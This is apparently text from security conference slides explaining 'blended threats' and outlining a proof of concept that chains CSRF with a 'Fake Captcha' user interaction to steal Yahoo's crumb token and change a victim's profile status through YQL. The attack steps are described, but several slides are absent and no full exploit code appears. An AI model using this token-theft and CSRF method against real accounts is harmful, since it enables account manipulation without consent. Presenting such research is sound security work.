3. “Blended Threat Concept”
• It has no clear definition because it’s more
a concept that an attack .
• But we have the following definition from
different sites:
4. Blended Threat Concept
• Definition from Wikipedia:
“A blended threat is a software vulnerability which in turn involves
a combination of attacks against different vulnerabilities. For
example, many worm, a trojan horse and a computer virus
exploit multiple techniques to attack and propagate. It is a kind
of computer threat.”
Link:
http://en.wikipedia.org/wiki/Blended_threat
5. Blended Threat Concept
• Definition from TrendMicro:
“ (…) A blended threat refers to a single threat that attacks via
multiple vectors (e.g., a worm gains entry via email and then
leverages back-door vulnerabilities for further infection and
destruction). “
Link:
http://apac.trendmicro.com/apac/threats/enterprise/threats-summary/blended-threats/
6. Blended Threat Concept
• My own definition:
“A Blended Threat: is a non-limited vector that
need two or more different attack,that are mutually
dependent, for manipulation of the usual
application logic.“
7. History of Blended Threat’s
• The person who introduce this kind of method
was: Billy (BK) Rios
• In his presentation: “Will it Blend”
• With this P.o.C :
Blended Threat from Combined Attack Using Apple’s
8. The P.o.C
My Proof Concept is:
• In a Yahoo! Service , called YQL
• Based on CSRF and one user interaction
In this presentation I will show a method to
validate YQL commands, without the console ,
more exactly :
! To change the status in the Yahoo! Profile
YQL = Yahoo Query Language
9. What is YQL
YQL is:
• A SQL-like language
• A clowd service
• W can create API’s or using other API’s and
manipulating the rezults in the “cloud”
• We can make authentificated YQL
commands in Yahoo!Inbox or Yahoo!Profile
10. YQL- Open Data Tables
• It’s a way to connect to the remote web
API (EndPoint) and understanding what to
do with the data that will get
• How it look like:
12. YQL –Use verb
• We can use simple server side javascripts in the
<execute> tab of the xml ,here some exemple:
• To make an object request we can use request:
Request.accept(‘application/json’)
.header(‘Authorization’, ‘…’)
.query(‘searchterm’, ‘foo’).get()
• The response.object can transmit the user the
final result :
Response.object = data
13. YQL – JS API
• Some key feature , what can do:
- use external JS files
- convert between XML JSON
- can make other YQL in the same YQL
14. How it look like in console
Link: http://developer.yahoo.com/yql/console/#h=update%20social.profile.status%20set%20status%3D%22EasterEgg
%22%20where%20guid%3Dme
15. How it look like in request
• First the console read the crumb (Yahoo!
Token )
• Second the console send the YQL
command with the crumb to the “cloud”
16. First Step: Read the crumb
Note: The crumb is generated no matter if the user is logged in
18. The P.o.C
• I have the “location” of the crumb
• I know where to send the data,but how to
convise the user to give us the crumb?!
19. The P.o.C
• I have the “location” of the crumb
• I know where to send the data,but how to
convise the user to give us the crumb?!
• Is simple …
20. Meanwhile …
• Why do dogs (and other animals) eat
poop?
“Herbivores such as rabbits eat their own poop because their
diet of plants is hard to digest efficiently, and they have to make
two passes at it to get everything out of the meal. “
21. The P.o.C
This is another version of the attack named “Fake Captcha” by
Kotowicz
23. How to gather the status
We can confirm by using the YQL command:
Link :
http://developer.yahoo.com/yql/console/#h=select%20message%20from%20social.profile.status%20where%20guid%3Dme
25. Credits
• Billy (BK) Rios
• Kotowicz
• Dragan European University , Lugoj , Timis
• Dan Kaminsky , in 2008 he “own-ed” the
internet. His work must not be forgoten!